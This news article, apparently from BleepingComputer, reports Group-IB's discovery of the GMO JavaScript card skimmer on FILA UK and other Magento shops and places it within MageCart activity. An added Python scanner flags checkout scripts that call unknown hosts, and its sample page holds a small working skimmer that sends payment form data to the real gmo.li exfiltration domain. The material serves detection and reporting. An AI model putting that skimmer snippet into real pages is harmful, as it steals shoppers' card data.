Among the websites actively leaking customers' sensitive data to an unauthorized third party is FILA UK, which has likely been compromised since November 2018.
Thieving script active on multiple websites
It is estimated that at least 5,600 shoppers of FILA sportswear have had their payment and personal details stolen so far, and every new customer who checks out on the website suffers the same fate. Other stores found running the same script include:
- Jungle Lee home design shop
- Forshaw pest management products store
- Absolute New York cosmetics seller
- Safe Harbor Computers shop for video editing and animation computer gear
- Cajun Grocer online grocery store
The script was discovered early this month and dubbed GMO by Group-IB, a company that specializes in preventing cyber attacks. The name comes from 'gmo[.]li', a domain registered on May 7, 2018, that the threat actor uses to exfiltrate the data. The researchers found the malware by automatically checking the HTML code of a large number of websites.
Possible ways the script was placed on the victim websites include exploiting a vulnerability in the Magento e-commerce platform used by the stores, or, as Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB, puts it, "compromising the credentials of the website administrator using special spyware or cracking the password with brute force methods."
The security outfit tried to alert the affected parties of the compromise, but none of them replied, despite several notifications.
"Group-IB reported the possible breach to local authorities in the UK and US as well. As of March 14th, the GMO sniffer has not been removed from all of these websites," a company representative told BleepingComputer.
Web skimmers and the groups behind them
Also known as a 'sniffer' or 'web skimmer,' the code is designed to capture payment card data as it is entered on a checkout page; the captured data is then sent to a server controlled by the cybercriminals, who collect it from there.
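The detection approach described above (checking page HTML at scale for scripts that load from, or send data to, hosts the shop does not own) can be reproduced in a few lines. The scanner below is an added example written for this article, not Group-IB's tooling; the allow-list of first-party hosts (`shop.example`, `cdn.shop.example`) and the checkout page it scans are constructed for the demonstration. The only real indicator it uses is the `gmo.li` exfiltration domain named in the report.

```python
"""Flag scripts on a checkout page that reference hosts outside the shop's own.

Added example, not Group-IB's scanner. ALLOWED_HOSTS and the sample page are
constructed; only the gmo.li domain comes from the report.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this (hypothetical) shop legitimately loads scripts from.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

# Absolute URLs embedded in inline script text, e.g. "https://gmo.li/collect".
URL_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect <script src=...> targets and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute values
        self.inline = []        # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser treats <script> content as raw text and delivers it here.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def host_of(url):
    """Lowercase host of an absolute or protocol-relative URL, or None for relative paths."""
    if url.startswith("//"):
        url = "https:" + url
    host = urlparse(url).hostname
    return host.lower() if host else None


def find_unknown_script_hosts(html, allowed=ALLOWED_HOSTS):
    """Return the sorted list of hosts referenced by scripts that are not in `allowed`.

    Covers both external script loads and URLs written into inline scripts,
    which is where a hand-injected skimmer usually keeps its drop address.
    """
    collector = ScriptCollector()
    collector.feed(html)
    hosts = set()
    for src in collector.external:
        host = host_of(src)
        if host and host not in allowed:
            hosts.add(host)
    for body in collector.inline:
        for host in URL_RE.findall(body):
            if host.lower() not in allowed:
                hosts.add(host.lower())
    return sorted(hosts)


# Constructed checkout page: two first-party scripts plus an injected inline
# block that posts the form contents to the exfiltration domain from the report.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="//shop.example/js/cart.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var data = new FormData(document.getElementById('checkout'));
    navigator.sendBeacon('https://gmo.li/collect', data);
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    print(find_unknown_script_hosts(SAMPLE_CHECKOUT_HTML))   # ['gmo.li']
```

Run across a crawl of checkout pages, any host the scanner reports is either a forgotten third-party tag or an injected skimmer, and both deserve a look. The check is deliberately simple: a skimmer that assembles its drop address from string fragments, or that loads a second stage at runtime, will not match `URL_RE`, so a literal-URL scan should be paired with a strict `Content-Security-Policy` (`script-src` and `connect-src` limited to the shop's own hosts) that blocks the exfiltration regardless of how the domain is hidden.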
The groups engaged in this type of card-skimming campaign have been active since 2015 and are known collectively as MageCart, a name coined by security company RiskIQ. Some of the big-name victims are British Airways, TicketMaster, OXO, and Newegg.
RiskIQ distinguishes at least 12 MageCart groups, each with different technical skills and running skimmers of varying sophistication.
"Since in some cases it is difficult to determine how many people use the sniffer, Group-IB experts call them families, not groups or threat actors," a company spokesperson told us, adding that there could be more than 30 different groups slinging this type of malware.
Group-IB told us that the GMO family of JS sniffers was injected manually into the victim websites, which suggests a young actor: one that has not appeared in previous reports and has used only one domain so far.
That does not mean the actor is unskilled, however, as the script relies on several techniques to hide its malicious activity.
In its research, Group-IB found 38 distinct families of JS sniffers. The company says its researchers are preparing a report that analyzes the activity of 15 groups, nine of which have not been publicly described before.
Date added: March 15, 2019, 9:36 a.m.